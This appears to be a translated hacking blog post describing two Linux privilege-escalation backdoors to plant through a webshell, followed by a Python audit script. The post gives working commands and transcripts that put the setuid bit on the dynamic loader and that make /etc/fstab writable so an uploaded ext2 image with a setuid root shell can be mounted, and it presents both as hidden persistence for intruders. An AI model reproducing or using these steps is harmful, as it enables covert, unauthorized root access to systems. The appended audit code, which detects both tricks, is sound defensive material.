Privilege Escalation and backdoor retention in LINUX in webshell

Source: Internet
Author: User

Method 1: the setuid method. This one is actually quite well hidden. Here is the procedure:

[root@localdomain lib]# ls -l | grep ld-linux
lrwxrwxrwx 1 root 9 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root 13 ld-lsb.so.3 -> ld-linux.so.2
[root@localdomain lib]# chmod +s ld-linux.so.2
[root@localdomain lib]# ls -l | grep ld-2.7.so
-rwsr-sr-x 1 root 128952 ld-2.7.so
lrwxrwxrwx 1 root 9 ld-linux.so.2 -> ld-2.7.so
[root@localdomain lib]#
Here we add the setuid bit to /lib/ld-linux.so.2 (which in FC8 is a symlink to ld-2.7.so, so the bit lands on that file). Now let's see how to use it.

Log in as a normal user and test the permissions:

[xiaoyu@localdomain ~]$ whoami
xiaoyu
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`
root
[xiaoyu@localdomain ~]$
Well, hey, root. How do you get a root shell from this? You can think about that yourself; there is no need to spell everything out, right? Haha. One thing you can be certain of: /lib/ld-linux.so.2 /bin/sh certainly won't give you a root shell, because bash checks whether the euid equals the uid and drops privileges if they differ... OK, enough said.

Method 2:

Here is the procedure:

[root@localdomain etc]# chmod a+w /etc/fstab
[root@localdomain etc]#

That is enough to retain access. Compared with XXOXX, I estimate that few administrators know this method. Demonstration of how to use it:

[xiaoyu@localdomain ~]$ ls -l /etc/fstab
-rw- 1 root 456 /etc/fstab
[xiaoyu@localdomain ~]$ echo test /mnt ext2 user,suid,exec,loop 0 0 > /etc/fstab

Then upload a file (an ext2 filesystem image) from the local machine to the target machine. Here we name it test.

[xiaoyu@localdomain tmp]$ ls -l test
-rw-r-- 1 xiaoyu 102400 2008-04-20 test
[xiaoyu@localdomain tmp]$ mount test
[xiaoyu@localdomain tmp]$ cd /mnt
[xiaoyu@localdomain mnt]$ ls -l
total 18
drwx------ 2 root 12288 2008-04-20 05:44 lost+found
-rwsr-sr-x 1 root 4927 2008-04-20 05:44 root
[xiaoyu@localdomain mnt]$ ./root
sh-3.2#
Now we can see that we have gone from an ordinary user to root. Haha.
As for this test file, it seems to be available as an upload on Baidu.

Some people may say that these are local backdoors that only a hacker with local access could use, but think it through: a webshell can do all of this ....
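Both methods leave traces an administrator can look for: a set-id bit on the dynamic loader, a world-writable /etc/fstab, and an fstab entry that combines a user-mountable option with suid. The following audit script is an added example written for this page, not code from the original post; the loader paths it checks and the sample fstab content are assumptions.

```python
import os
import stat

# Constructed sample fstab; the last line is what the post's echo command writes.
SAMPLE_FSTAB = """\
/dev/sda1 / ext4 defaults 1 1
tmpfs /dev/shm tmpfs defaults 0 0
test /mnt ext2 user,suid,exec,loop 0 0
"""
USER_MOUNT_OPTIONS = {"user", "users", "owner", "group"}


def risky_fstab_entries(fstab_text):
    """Entries an unprivileged user may mount with setuid honoured:
    'user'/'users' imply nosuid, but an explicit 'suid' re-enables it."""
    findings = []
    for line in fstab_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].startswith("#"):
            continue
        device, mountpoint, fstype, options = fields[:4]
        opts = set(options.split(","))
        if opts & USER_MOUNT_OPTIONS and "suid" in opts:
            findings.append((device, mountpoint, fstype, options))
    return findings

def is_setid(mode):
    """True if an st_mode value carries the setuid or setgid bit."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))

def is_world_writable(mode):
    """True if an st_mode value grants write permission to 'other'."""
    return bool(mode & stat.S_IWOTH)

def audit(fstab_path="/etc/fstab",
          loaders=("/lib/ld-linux.so.2", "/lib64/ld-linux-x86-64.so.2")):
    """Live check for both tricks. os.stat follows the ld-linux.so.2 symlink,
    so the mode of the real loader file (ld-2.7.so in the post) is tested.
    The loader paths are assumptions; adjust them for the distribution."""
    report = []
    if os.path.exists(fstab_path):
        if is_world_writable(os.stat(fstab_path).st_mode):
            report.append(f"{fstab_path} is world-writable")
        with open(fstab_path) as fh:
            for entry in risky_fstab_entries(fh.read()):
                report.append(f"user-mountable suid entry: {entry}")
    for path in loaders:
        if os.path.exists(path) and is_setid(os.stat(path).st_mode):
            report.append(f"{path} has setuid/setgid set")
    return report
```

Run `audit()` on a live host to get a list of findings; an empty list means none of the three traces is present.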
